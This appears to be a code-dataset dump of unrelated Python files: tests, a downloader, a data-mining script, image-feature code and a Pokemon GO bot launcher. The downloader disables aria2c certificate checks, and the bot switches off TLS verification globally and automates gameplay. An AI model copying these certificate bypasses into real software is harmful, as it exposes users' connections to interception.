id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
83304 | import os
import pytest
from scripttease.library.commands import Command, ItemizedCommand
from scripttease.parsers.utils import *
def test_filter_commands():
commands = [
Command("apt-get install apache2 -y", environments=["base"], tags=["web"]),
Command("apt-get install apache-top -y", environments=["live"], tags=["web"]),
Command("pip install django-debug-toolbar", environments=["development"], tags=["django"]),
Command("pip install django", environments=["base"], tags=["django"]),
]
f1 = filter_commands(commands, environments=["base", "live"])
assert len(f1) == 3
f2 = filter_commands(commands, tags=["django"])
assert len(f2) == 2
f3 = filter_commands(commands, environments=["base", "development"])
assert len(f3) == 3
f4 = filter_commands(commands, environments=["base"], tags=["web"])
assert len(f4) == 1
def test_load_commands():
commands = load_commands("nonexistent.xml")
assert commands is None
commands = load_commands("nonexistent.ini")
assert commands is None
commands = load_commands("tests/examples/bad_examples.ini")
assert commands is None
commands = load_commands(
"tests/examples/python_examples.ini",
filters={
'tags': ["python-support"],
}
)
assert len(commands) == 2
def test_load_variables():
assert len(load_variables("nonexistent.ini")) == 0
assert len(load_variables(os.path.join("tests", "examples", "templates", "simple.txt"))) == 0
variables = load_variables(os.path.join("tests", "examples", "variables.ini"))
assert len(variables) == 5
variables = load_variables(os.path.join("tests", "examples", "variables.ini"), environment="testing")
assert len(variables) == 4
class TestContext(object):
def test_add(self):
c = Context()
c.add("testing", True)
assert len(c.variables) == 1
c.add("also_testing", False)
assert len(c.variables) == 2
assert isinstance(c.add("still_testing", True), Variable)
with pytest.raises(RuntimeError):
c.add("testing", True)
def test_get(self):
c = Context(testing=True)
assert c.get("testing") is True
assert c.get("nonexistent") is None
assert c.get("nonexistent", default=True) is True
def test_getattr(self):
c = Context(testing=True)
assert c.testing is True
assert c.nonexistent is None
def test_has(self):
c = Context(testing=True)
assert c.has("testing") is True
assert c.has("nonexistent") is False
def test_init(self):
c = Context(testing=True, also_testing=123)
assert len(c.variables) == 2
def test_join(self):
c = Context(testing=True)
variables = [
Variable("testing", True),
Variable("also_testing", True),
]
c.join(variables)
assert len(c.variables) == 2
def test_mapping(self):
c = Context(testing=True, also_testing=False, still_testing=True)
assert type(c.mapping()) is dict
assert len(c.mapping()) == 3
def test_merge(self):
c1 = Context(testing=True, also_testing=False)
c2 = Context(still_testing=True)
c1.merge(c2)
assert len(c1.variables) == 3
def test_repr(self):
c = Context(testing=True, also_testing=False, still_testing=True)
assert repr(c) == "<Context (3)>"
class TestVariable(object):
def test_eq(self):
var = Variable("testing", True)
assert var == True
def test_getattr(self):
var = Variable("testing", True, one="a", two="b")
assert var.one == "a"
assert var.two == "b"
assert var.three is None
def test_repr(self):
var = Variable("testing", True)
assert repr(var) == "<Variable testing>"
| StarcoderdataPython |
5094573 | # Copyright (C) 2021 by Ivan.
# This file is part of Snowflake package.
# Snowflake is released under the MIT License (see LICENSE).
from datetime import tzinfo, timedelta
import pytest
from snowflake import Snowflake
from snowflake.snowflake import MAX_TS, MAX_SEQ, MAX_INSTANCE
def test_parse():
class UTC0531(tzinfo):
_offset = timedelta(seconds=19860)
_dst = timedelta(0)
def utcoffset(self, dt):
return self.__class__._offset
def dst(self, dt):
return self.__class__._dst
sf = Snowflake.parse(856165981072306191, 1288834974657)
assert sf.timestamp == 204125876682
assert sf.instance == 363
assert sf.epoch == 1288834974657
assert sf.seq == 15
assert sf.seconds == 1492960851.339
assert sf.milliseconds == 1492960851339
assert str(sf.datetime) == "2017-04-23 15:20:51.339000"
assert str(sf.datetime_tz(UTC0531())) == "2017-04-23 20:51:51.339000+05:31"
assert str(sf.timedelta) == "14917 days, 1:42:54.657000"
assert sf.value == 856165981072306191
def test_min():
assert Snowflake(0, 0).value == 0
def test_max():
assert Snowflake(MAX_TS, MAX_INSTANCE, seq=MAX_SEQ).value == 9223372036854775807
def test_timestamp_overflow():
Snowflake(0, 0)
Snowflake(MAX_TS, 0)
with pytest.raises(ValueError, match="timestamp must be greater than 0 and less than 2199023255551!"):
Snowflake(MAX_TS + 1, 0)
with pytest.raises(ValueError, match="timestamp must be greater than 0 and less than 2199023255551!"):
Snowflake(-1, 0)
def test_instance_overflow():
Snowflake(0, 0)
Snowflake(0, MAX_INSTANCE)
with pytest.raises(ValueError, match="instance must be greater than 0 and less than 1023!"):
Snowflake(0, -1)
with pytest.raises(ValueError, match="instance must be greater than 0 and less than 1023!"):
Snowflake(0, MAX_INSTANCE + 1)
def test_epoch_overflow():
Snowflake(0, 0, epoch=0)
with pytest.raises(ValueError, match="epoch must be greater than 0!"):
Snowflake(0, 0, epoch=-1)
def test_seq_overflow():
Snowflake(0, 0, seq=0)
Snowflake(0, 0, seq=MAX_SEQ)
with pytest.raises(ValueError, match="seq must be greater than 0 and less than 4095!"):
Snowflake(0, 0, seq=-1)
with pytest.raises(ValueError, match="seq must be greater than 0 and less than 4095!"):
Snowflake(0, 0, seq=MAX_SEQ + 1)
| StarcoderdataPython |
376826 | ##############################################################################
#
# <NAME>
# <EMAIL>
# References:
# SuperDataScience,
# Official Documentation
# Meta Information:
# __version__ = '1.1.1'
# __author__ = '<NAME>'
# __author_email__ = '<EMAIL>'
#
##############################################################################
# Apriori
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Data Preprocessing
dataset = pd.read_csv('Market_Basket_Optimisation.csv', header = None)
transactions = []
# Create an array of transactions
for i in range(0, 7501):
transactions.append([str(dataset.values[i,j]) for j in range(0, 20)])
# Training Apriori on the dataset
from apyori import apriori
rules = apriori(transactions, min_support = 0.003, min_confidence = 0.2, min_lift = 3, min_length = 2)
# Visualising the results
results = list(rules) | StarcoderdataPython |
3465376 | <filename>glrlm/operator.py
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 04 12:56:00 2022
@author: eiproject
"""
from .model import DegreeGLRLM, FeatureGLRLM
class Operator:
"""
GLRLM Operator for SRE, LRE, GLU, RLU, RPC
"""
def __init__(self):
self.title = "GLRLM Operator"
self.__degree_obj:DegreeGLRLM = None
def __SRE(self):
input_matrix = self.__degree_obj.Degrees
matSRE = []
for input_matrix in input_matrix:
S = 0
SRE = 0
for x in range(input_matrix.shape[1]):
for y in range(input_matrix.shape[0]):
S += input_matrix[y][x]
for x in range(input_matrix.shape[1]):
Rj = 0
for y in range(input_matrix.shape[0]):
Rj += input_matrix[y][x]
SRE += (Rj/S)/((x+1)**2)
# print('( ',Rj,'/',S,' ) / ',(x+1)**2)
SRE = round(SRE, 3)
matSRE.append(SRE)
# print('Perhitungan SRE')
return round(sum(matSRE),3)
def __LRE(self):
input_matrix = self.__degree_obj.Degrees
matLRE = []
for input_matrix in input_matrix:
S = 0
LRE = 0
for x in range(input_matrix.shape[1]):
for y in range(input_matrix.shape[0]):
S += input_matrix[y][x]
for x in range(input_matrix.shape[1]):
Rj = 0
for y in range(input_matrix.shape[0]):
Rj += input_matrix[y][x]
LRE += (Rj * ((x + 1) ** 2)) / S
# print('( ', Rj ,' * ',((x + 1) ** 2), ' ) /', S)
LRE = round(LRE, 3)
matLRE.append(LRE)
# print('Perhitungan LRE')
return round(sum(matLRE),3)
def __GLU(self):
input_matrix = self.__degree_obj.Degrees
matGLU = []
for input_matrix in input_matrix:
S = 0
GLU = 0
for x in range(input_matrix.shape[1]):
for y in range(input_matrix.shape[0]):
S += input_matrix[y][x]
for x in range(input_matrix.shape[1]):
Rj = 0
for y in range(input_matrix.shape[0]):
Rj += input_matrix[y][x]
GLU += ((x + 1) ** 2) / S
# print('( ',((x + 1) ** 2), ' ) /', S)
GLU = round(GLU, 3)
matGLU.append(GLU)
# print('Perhitungan GLU')
return round(sum(matGLU),3)
def __RLU(self):
input_matrix = self.__degree_obj.Degrees
matRLU = []
for input_matrix in input_matrix:
S = 0
RLU = 0
for x in range(input_matrix.shape[1]):
for y in range(input_matrix.shape[0]):
S += input_matrix[y][x]
for x in range(input_matrix.shape[1]):
Rj = 0
for y in range(input_matrix.shape[0]):
Rj += input_matrix[y][x]
RLU += (Rj ** 2) / S
# print('( ', (Rj ** 2), ' ) /', S)
RLU = round(RLU, 3)
matRLU.append(RLU)
# print('Perhitungan RLU')
return round(sum(matRLU),3)
def __RPC(self):
input_matrix = self.__degree_obj.Degrees
matRPC = []
for input_matrix in input_matrix:
S = 0
RPC = 0
for x in range(input_matrix.shape[1]):
for y in range(input_matrix.shape[0]):
S += input_matrix[y][x]
for x in range(input_matrix.shape[1]):
Rj = 0
for y in range(input_matrix.shape[0]):
Rj += input_matrix[y][x]
RPC += (Rj) / (input_matrix.shape[0]*input_matrix.shape[1])
# print('( ', (Rj), ' ) /', input_matrix.shape[0]*input_matrix.shape[1])
RPC = round(RPC, 3)
matRPC.append(RPC)
# print('Perhitungan RPC')
return round(sum(matRPC),3)
def create_feature(self, degree:DegreeGLRLM):
self.__degree_obj = degree
return FeatureGLRLM(
self.__SRE(),
self.__LRE(),
self.__GLU(),
self.__RLU(),
self.__RPC())
| StarcoderdataPython |
12846915 | #!/usr/bin/env python
import sys
import subprocess
import urllib2
import base64
import re
import os.path
from bs4 import BeautifulSoup, NavigableString
USERNAME = "YOUR_USERNAME"
PASSWORD = "<PASSWORD>"
def startAndWaitForAria(chdir, url):
if os.path.exists(chdir) is not True:
print "Path {0} does not exist, attempting to create".format(chdir)
try:
os.makedirs(chdir)
except:
print "Failed to make directory, exiting"
return
os.chdir(chdir)
print "Downloading: {0} to {1}".format(url, chdir)
p = subprocess.Popen(['/usr/bin/aria2c', '-s16', '-x16', '-k1M', '--check-certificate=false', '--http-user={0}'.format(USERNAME), '--http-passwd={0}'.format(PASSWORD), url])
p.wait()
def findFilesWithPattern(cwd, baseurl, pattern):
downloadList = []
data = downloadAuthFile(baseurl)
if data is None:
return downloadList
data = data.read()
soup = BeautifulSoup(data)
table = soup.select('table')
if len(table):
for tr in table[0].find_all('tr'):
if len(tr.contents) < 4:
print "Incompatible HTTP list type"
continue
# Name Last Modified Size Type
dlname = tr.contents[0]
dltype = tr.contents[3]
if dlname is None or dltype is None:
print "Parse error #1"
continue
if type(dlname.next_element) is NavigableString:
continue
dlurl = dlname.next_element
if dlurl is None:
print "Parse error #2"
continue
# I added pattern check because if we're pattern matching we probably only want things from one directory
# Recursion here could end up causing weird problems, especially if we're using it to download files from a root folder for example
# It would traverse all the directories and end up downloading every file on the entire box that matched. Not good.
# I will probably add a -r switch or something for this specific purpose
if dltype.text.startswith('Directory') and dlurl['href'].startswith('.') is not True and pattern is None:
newcwd = cwd + urllib2.unquote(dlurl['href'])
print "Directory: " + newcwd
downloadList = downloadList + findFilesWithPattern(newcwd, "{0}{1}".format(baseurl, dlurl['href']), pattern)
else:
filename = dlurl.contents[0]
href = dlurl['href']
if pattern is not None:
if pattern.findall(filename):
p = [cwd, "{0}{1}".format(baseurl, href)]
downloadList.append(p)
else:
if href.startswith('.') is not True:
p = [cwd, "{0}{1}".format(baseurl, href)]
downloadList.append(p)
return downloadList
def getBasicAuthString():
return base64.encodestring('%s:%s' % (USERNAME, PASSWORD)).replace('\n', '')
def downloadFileList(downloads):
if len(downloads) > 0:
for f in downloads:
startAndWaitForAria(f[0], f[1])
else:
print "No files found in directory!"
def singleFileDownload(url):
if url.endswith('/'):
downloadFileList(findFilesWithPattern(os.getcwd() + '/', url, None))
else:
startAndWaitForAria(os.getcwd() + '/', url)
def multiRegexDownload(url, reg):
if url.endswith('/') is not True:
print "This mode only supports directories!"
else:
downloadFileList(findFilesWithPattern(os.getcwd() + '/', url, re.compile(reg)))
def downloadAuthFile(url):
request = urllib2.Request(url)
request.add_header("Authorization", "Basic %s" % getBasicAuthString())
try:
return urllib2.urlopen(request)
except urllib2.URLError, e:
print "URL Error ({0}): {1}".format(e.errno, e.strerror)
except urllib2.HTTPError, e:
print "HTTP Error ({0}): {1}".format(e.errno, e.strerror)
except:
print "Unknown Exception: ", sys.exc_info()[0]
return None
if len(sys.argv) == 2:
singleFileDownload(sys.argv[1])
elif len(sys.argv) == 3:
multiRegexDownload(sys.argv[1], sys.argv[2])
else:
print "Parameter mismatch: Please enter URL to either a file, or a directory with an optional regex pattern" | StarcoderdataPython |
11269314 | for i in range(int(input())):
answer = sum(filter(lambda x: x % 2, map(int, input().split())))
print("#{} {}".format(i + 1, answer)) | StarcoderdataPython |
5175365 | <reponame>ivan-c/truenth-portal<filename>portal/migrations/versions/72dcf1946d3f_.py<gh_stars>1-10
from alembic import op
import sqlalchemy as sa
"""empty message
Revision ID: <KEY>
Revises: ('<KEY>', '<PASSWORD>')
Create Date: 2017-12-12 12:43:16.976320
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = ('<KEY>', '<PASSWORD>')
def upgrade():
pass
def downgrade():
pass
| StarcoderdataPython |
8046724 | # Generated by Django 2.0 on 2019-02-07 16:19
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('base', '0052_fill_new_item_order'),
]
operations = [
migrations.AddField(
model_name='workcyclegroup',
name='project',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='project_groups', to='base.Project'),
),
]
| StarcoderdataPython |
332214 | <reponame>tdiprima/code
from Numeric import *
def peaks(data, step):
n = len(data) - len(data)%step # ignore tail
slices = [ data[i:n:step] for i in range(step) ]
peak_max = reduce(maximum, slices)
peak_min = reduce(minimum, slices)
return transpose(array([peak_max, peak_min]))
"""example of use:
>>> x = sin(arrayrange(0, 3.14, 1e-5))
>>> len(x)
314000
>>> peaks(x,10000)
array([[ 0.09982347, 0. ],
[ 0.19865953, 0.09983342],
...
[ 0.23924933, 0.14112991],
[ 0.14112001, 0.04159065]])
"""
| StarcoderdataPython |
9702638 | <reponame>VLAM3D/vulkanmitts<gh_stars>1-10
import unittest
import pyglslang
from glsl_to_spv import *
class TestInit(unittest.TestCase):
def test_init_glslang(self):
pyglslang.InitializeProcess()
pyglslang.FinalizeProcess()
def test_program(self):
pyglslang.InitializeProcess()
program = pyglslang.TProgram()
self.assertIsNotNone(program)
pyglslang.FinalizeProcess()
def test_glsl_version_string(self):
version_string = pyglslang.GetGlslVersionString()
self.assertIsNotNone(version_string)
self.assertTrue(len(version_string) > 0)
def test_essl_version_string(self):
version_string = pyglslang.GetEsslVersionString()
self.assertIsNotNone(version_string)
self.assertTrue(len(version_string) > 0)
def test_khronos_tool_id(self):
tool_id = pyglslang.GetKhronosToolId()
self.assertIsNotNone(tool_id)
self.assertTrue(tool_id > 0)
class TestShadersCtor(unittest.TestCase):
def setUp(self):
pyglslang.InitializeProcess()
def test_vertex_shader(self):
shader = pyglslang.TShader(pyglslang.EShLangVertex)
self.assertIsNotNone(shader)
def test_tess_ctrl_shader(self):
shader = pyglslang.TShader(pyglslang.EShLangTessControl)
self.assertIsNotNone(shader)
def test_tess_eval_shader(self):
shader = pyglslang.TShader(pyglslang.EShLangTessEvaluation)
self.assertIsNotNone(shader)
def test_geo_shader(self):
shader = pyglslang.TShader(pyglslang.EShLangGeometry)
self.assertIsNotNone(shader)
def test_frag_shader(self):
shader = pyglslang.TShader(pyglslang.EShLangFragment)
self.assertIsNotNone(shader)
def test_compute_shader(self):
shader = pyglslang.TShader(pyglslang.EShLangCompute)
self.assertIsNotNone(shader)
def tearDown(self):
pyglslang.FinalizeProcess()
class TestGLSLToSPV(unittest.TestCase):
def setUp(self):
with open('vertex_shader.glsl','r') as vs_in:
self.vs_txt = vs_in.read()
with open('fragment_shader.glsl','r') as fs_in:
self.fs_txt = fs_in.read()
def test_vertex_shader_to_spv(self):
spv = glsl_to_spv(pyglslang.EShLangVertex, self.vs_txt)
def test_vertex_shader_to_spv(self):
spv = glsl_to_spv(pyglslang.EShLangFragment, self.fs_txt)
class TestDisassembler(unittest.TestCase):
def setUp(self):
with open('vertex_shader.glsl','r') as vs_in:
self.vs_txt = vs_in.read()
with open('fragment_shader.glsl','r') as fs_in:
self.fs_txt = fs_in.read()
def test_disassembler_stdout(self):
spv = glsl_to_spv(pyglslang.EShLangVertex, self.vs_txt)
pyglslang.disassemble_stdout(spv)
def test_disassembler(self):
spv = glsl_to_spv(pyglslang.EShLangVertex, self.vs_txt)
pyglslang.disassemble(spv,'test_disassemble.txt')
if __name__ == '__main__':
# set defaultTest to invoke a specific test case
unittest.main() | StarcoderdataPython |
3351406 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
import argparse
import codecs
import json
import logging
import os
import ssl
import sys
import time
from datetime import timedelta
from getpass import getpass
from pgoapi.exceptions import NotLoggedInException
from pokemongo_bot import PokemonGoBot, TreeConfigBuilder
from pokemongo_bot import logger
if sys.version_info >= (2, 7, 9):
ssl._create_default_https_context = ssl._create_unverified_context
def main():
logger.log('PokemonGO Bot v1.0', 'green')
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
sys.stderr = codecs.getwriter('utf8')(sys.stderr)
config = init_config()
if not config:
return
logger.log('Configuration initialized', 'yellow')
finished = False
while not finished:
try:
bot = PokemonGoBot(config)
bot.start()
tree = TreeConfigBuilder(bot, config.raw_tasks).build()
bot.workers = tree
bot.metrics.capture_stats()
logger.log('Starting PokemonGo Bot....', 'green')
while True:
bot.tick()
except KeyboardInterrupt:
logger.log('Exiting PokemonGo Bot', 'red')
finished = True
report_summary(bot)
except NotLoggedInException:
logger.log('[x] Error while connecting to the server, please wait %s minutes' % config.reconnecting_timeout, 'red')
time.sleep(config.reconnecting_timeout * 60)
except:
# always report session summary and then raise exception
report_summary(bot)
raise
def report_summary(bot):
if bot.metrics.start_time is None:
return # Bot didn't actually start, no metrics to show.
metrics = bot.metrics
metrics.capture_stats()
logger.log('')
logger.log('Ran for {}'.format(metrics.runtime()), 'cyan')
logger.log('Total XP Earned: {} Average: {:.2f}/h'.format(metrics.xp_earned(), metrics.xp_per_hour()), 'cyan')
logger.log('Travelled {:.2f}km'.format(metrics.distance_travelled()), 'cyan')
logger.log('Visited {} stops'.format(metrics.visits['latest'] - metrics.visits['start']), 'cyan')
logger.log('Encountered {} pokemon, {} caught, {} released, {} evolved, {} never seen before'
.format(metrics.num_encounters(), metrics.num_captures(), metrics.releases,
metrics.num_evolutions(), metrics.num_new_mons()), 'cyan')
logger.log('Threw {} pokeball{}'.format(metrics.num_throws(), '' if metrics.num_throws() == 1 else 's'),
'cyan')
logger.log('Earned {} Stardust'.format(metrics.earned_dust()), 'cyan')
logger.log('')
if metrics.highest_cp is not None:
logger.log('Highest CP Pokemon: {}'.format(metrics.highest_cp['desc']), 'cyan')
if metrics.most_perfect is not None:
logger.log('Most Perfect Pokemon: {}'.format(metrics.most_perfect['desc']), 'cyan')
def init_config():
parser = argparse.ArgumentParser()
config_file = "configs/config.json"
web_dir = "web"
# If config file exists, load variables from json
load = {}
# Select a config file code
parser.add_argument("-cf", "--config", help="Config File to use")
config_arg = parser.parse_known_args() and parser.parse_known_args()[0].config or None
if config_arg and os.path.isfile(config_arg):
with open(config_arg) as data:
load.update(json.load(data))
elif os.path.isfile(config_file):
logger.log('No config argument specified, checking for /configs/config.json', 'yellow')
with open(config_file) as data:
load.update(json.load(data))
else:
logger.log('Error: No /configs/config.json or specified config', 'red')
# Read passed in Arguments
required = lambda x: not x in load
add_config(
parser,
load,
short_flag="-a",
long_flag="--auth_service",
help="Auth Service ('ptc' or 'google')",
required=required("auth_service"),
default=None
)
add_config(
parser,
load,
short_flag="-u",
long_flag="--username",
help="Username",
default=None
)
add_config(
parser,
load,
short_flag="-ws",
long_flag="--websocket_server",
help="Start websocket server (format 'host:port')",
default=False
)
add_config(
parser,
load,
short_flag="-p",
long_flag="--password",
help="Password",
default=None
)
add_config(
parser,
load,
short_flag="-l",
long_flag="--location",
help="Location",
type=parse_unicode_str,
default=''
)
add_config(
parser,
load,
short_flag="-lc",
long_flag="--location_cache",
help="Bot will start at last known location",
type=bool,
default=False
)
add_config(
parser,
load,
long_flag="--forts.spin",
help="Enable Spinning Pokestops",
type=bool,
default=True,
)
add_config(
parser,
load,
short_flag="-w",
long_flag="--walk",
help=
"Walk instead of teleport with given speed (meters per second, e.g. 2.5)",
type=float,
default=2.5
)
add_config(
parser,
load,
short_flag="-k",
long_flag="--gmapkey",
help="Set Google Maps API KEY",
type=str,
default=None
)
add_config(
parser,
load,
short_flag="-ms",
long_flag="--max_steps",
help=
"Set the steps around your initial location(DEFAULT 5 mean 25 cells around your location)",
type=int,
default=50
)
add_config(
parser,
load,
short_flag="-n",
long_flag="--navigator.type",
help="Set the navigator to be used(DEFAULT spiral)",
type=str,
default='spiral'
)
add_config(
parser,
load,
short_flag="-pm",
long_flag="--navigator.path_mode",
help="Set the mode for the path navigator (DEFAULT loop)",
type=str,
default="loop"
)
add_config(
parser,
load,
short_flag="-pf",
long_flag="--navigator.path_file",
help="Set the file containing the path for the path navigator (GPX or JSON).",
type=str,
default=None
)
add_config(
parser,
load,
short_flag="-d",
long_flag="--debug",
help="Debug Mode",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-t",
long_flag="--test",
help="Only parse the specified location",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-du",
long_flag="--distance_unit",
help="Set the unit to display distance in (e.g, km for kilometers, mi for miles, ft for feet)",
type=str,
default='km'
)
add_config(
parser,
load,
short_flag="-ev",
long_flag="--evolve_all",
help="(Batch mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will start by attempting to evolve all pokemon. Great after popping a lucky egg!",
type=str,
default=[]
)
add_config(
parser,
load,
short_flag="-ecm",
long_flag="--evolve_cp_min",
help="Minimum CP for evolve all. Bot will attempt to first evolve highest IV pokemon with CP larger than this.",
type=int,
default=300
)
add_config(
parser,
load,
short_flag="-ec",
long_flag="--evolve_captured",
help="(Ad-hoc mode) Pass \"all\" or a list of pokemon to evolve (e.g., \"Pidgey,Weedle,Caterpie\"). Bot will attempt to evolve all the pokemon captured!",
type=str,
default=[]
)
add_config(
parser,
load,
short_flag="-le",
long_flag="--use_lucky_egg",
help="Uses lucky egg when using evolve_all",
type=bool,
default=False
)
add_config(
parser,
load,
short_flag="-rt",
long_flag="--reconnecting_timeout",
help="Timeout between reconnecting if error occured (in minutes, e.g. 15)",
type=float,
default=15.0
)
add_config(
parser,
load,
short_flag="-hr",
long_flag="--health_record",
help="Send anonymous bot event to GA for bot health record. Set \"health_record\":false if you need disable it.",
type=bool,
default=True
)
add_config(
parser,
load,
short_flag="-ac",
long_flag="--forts.avoid_circles",
help="Avoids circles (pokestops) of the max size set in max_circle_size flag",
type=bool,
default=False,
)
add_config(
parser,
load,
short_flag="-mcs",
long_flag="--forts.max_circle_size",
help="If avoid_circles flag is set, this flag specifies the maximum size of circles (pokestops) avoided",
type=int,
default=10,
)
add_config(
parser,
load,
long_flag="--catch_randomize_reticle_factor",
help="Randomize factor for pokeball throwing accuracy (DEFAULT 1.0 means no randomize: always 'Excellent' throw. 0.0 randomizes between normal and 'Excellent' throw)",
type=float,
default=1.0
)
add_config(
parser,
load,
long_flag="--catch_randomize_spin_factor",
help="Randomize factor for pokeball curve throwing (DEFAULT 1.0 means no randomize: always perfect 'Super Spin' curve ball. 0.0 randomizes between normal and 'Super Spin' curve ball)",
type=float,
default=1.0
)
# Start to parse other attrs
config = parser.parse_args()
if not config.username and 'username' not in load:
config.username = raw_input("Username: ")
if not config.password and 'password' not in load:
config.password = <PASSWORD>pass("Password: ")
config.catch = load.get('catch', {})
config.release = load.get('release', {})
config.item_filter = load.get('item_filter', {})
config.action_wait_max = load.get('action_wait_max', 4)
config.action_wait_min = load.get('action_wait_min', 1)
config.raw_tasks = load.get('tasks', [])
config.vips = load.get('vips',{})
if len(config.raw_tasks) == 0:
logging.error("No tasks are configured. Did you mean to configure some behaviors? Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information")
return None
if config.auth_service not in ['ptc', 'google']:
logging.error("Invalid Auth service specified! ('ptc' or 'google')")
return None
def task_configuration_error(flag_name):
parser.error("""
\"{}\" was removed from the configuration options.
You can now change the behavior of the bot by modifying the \"tasks\" key.
Read https://github.com/PokemonGoF/PokemonGo-Bot/wiki/Configuration-files#configuring-tasks for more information.
""".format(flag_name))
old_flags = ['mode', 'catch_pokemon', 'spin_forts', 'forts_spin', 'hatch_eggs', 'release_pokemon', 'softban_fix',
'longer_eggs_first']
for flag in old_flags:
if flag in load:
task_configuration_error(flag)
return None
nested_old_flags = [('forts', 'spin'), ('forts', 'move_to_spin')]
for outer, inner in nested_old_flags:
if load.get(outer, {}).get(inner, None):
task_configuration_error('{}.{}'.format(outer, inner))
return None
if (config.evolve_captured
and (not isinstance(config.evolve_captured, str)
or str(config.evolve_captured).lower() in ["true", "false"])):
parser.error('"evolve_captured" should be list of pokemons: use "all" or "none" to match all ' +
'or none of the pokemons, or use a comma separated list such as "Pidgey,Weedle,Caterpie"')
return None
if not (config.location or config.location_cache):
parser.error("Needs either --use-location-cache or --location.")
return None
if config.catch_randomize_reticle_factor < 0 or 1 < config.catch_randomize_reticle_factor:
parser.error("--catch_randomize_reticle_factor is out of range! (should be 0 <= catch_randomize_reticle_factor <= 1)")
return None
if config.catch_randomize_spin_factor < 0 or 1 < config.catch_randomize_spin_factor:
parser.error("--catch_randomize_spin_factor is out of range! (should be 0 <= catch_randomize_spin_factor <= 1)")
return None
# item list config verification
item_list = json.load(open(os.path.join('data', 'items.json')))
for config_item_name, bag_count in config.item_filter.iteritems():
if config_item_name not in item_list.viewvalues():
if config_item_name not in item_list:
parser.error('item "' + config_item_name + '" does not exist, spelling mistake? (check for valid item names in data/items.json)')
return None
# create web dir if not exists
try:
os.makedirs(web_dir)
except OSError:
if not os.path.isdir(web_dir):
raise
if config.evolve_all and isinstance(config.evolve_all, str):
config.evolve_all = [str(pokemon_name) for pokemon_name in config.evolve_all.split(',')]
if config.evolve_captured and isinstance(config.evolve_captured, str):
config.evolve_captured = [str(pokemon_name) for pokemon_name in config.evolve_captured.split(',')]
fix_nested_config(config)
return config
def add_config(parser, json_config, short_flag=None, long_flag=None, **kwargs):
if not long_flag:
raise Exception('add_config calls requires long_flag parameter!')
full_attribute_path = long_flag.split('--')[1]
attribute_name = full_attribute_path.split('.')[-1]
if '.' in full_attribute_path: # embedded config!
embedded_in = full_attribute_path.split('.')[0: -1]
for level in embedded_in:
json_config = json_config.get(level, {})
if 'default' in kwargs:
kwargs['default'] = json_config.get(attribute_name, kwargs['default'])
if short_flag:
args = (short_flag, long_flag)
else:
args = (long_flag,)
parser.add_argument(*args, **kwargs)
def fix_nested_config(config):
config_dict = config.__dict__
for key, value in config_dict.iteritems():
if '.' in key:
new_key = key.replace('.', '_')
config_dict[new_key] = value
del config_dict[key]
def parse_unicode_str(string):
try:
return string.decode('utf8')
except UnicodeEncodeError:
return string
if __name__ == '__main__':
main()
| StarcoderdataPython |
6634061 | imgPaths = [
'GroundTruth/DIV2K_0832',
'Noisy/DIV2K_0832_gaussian',
'Noisy/DIV2K_0832_poisson',
'Noisy/DIV2K_0832_snp',
'Denoised/DnCNN/DIV2K_0832_gaussian',
'Denoised/DnCNN/DIV2K_0832_poisson',
'Denoised/DnCNN/DIV2K_0832_snp',
'Denoised/GaussianLP/DIV2K_0832_gaussian',
'Denoised/GaussianLP/DIV2K_0832_poisson',
'Denoised/GaussianLP/DIV2K_0832_snp',
'Denoised/NLM/DIV2K_0832_gaussian',
'Denoised/NLM/DIV2K_0832_poisson',
'Denoised/NLM/DIV2K_0832_snp',
]
imgPaths = [x + '.bmp' for x in imgPaths]
CROP_BOX = (1527, 297, 1527 + 512, 297 + 512)
from os import path
from PIL import Image
from tqdm import tqdm
for imgPath in tqdm(imgPaths, ncols=80):
img = Image.open('F:/nlm-cuda/experiment/' + imgPath)
img = img.crop(CROP_BOX)
img.save(path.join('F:/nlm-cuda/experiment/Crop/', imgPath.replace('/', '-')))
| StarcoderdataPython |
6656306 | import math
from panda3d.core import *
import NametagGlobals
from MarginPopup import MarginPopup
from Nametag import Nametag
from _constants import *
class Nametag2d(Nametag, MarginPopup):
def __init__(self):
Nametag.__init__(self, 8.075)
MarginPopup.__init__(self)
self.m_copied_np = None
self.m_attached_np = None
self.m_arrow = None
self.m_unknown_np = None
# self.setCullCallback()
self.cbNode = CallbackNode(self.getName() + '-cbNode')
self.cbNode.setCullCallback(PythonCallbackObject(self.cullCallback))
self.addChild(self.cbNode)
self.setName('unnamed')
self.m_contents = 3
self.m_chat_contents = 0
self.updateContents()
self.m_on = NametagGlobals._master_arrows_on
self.m_seq2d = 0
self.m_trans_vec = Vec3(0, 0, 0)
def setVisible(self, value):
self.m_visible = value
self.updateContents()
def manage(self, manager):
self.updateContents()
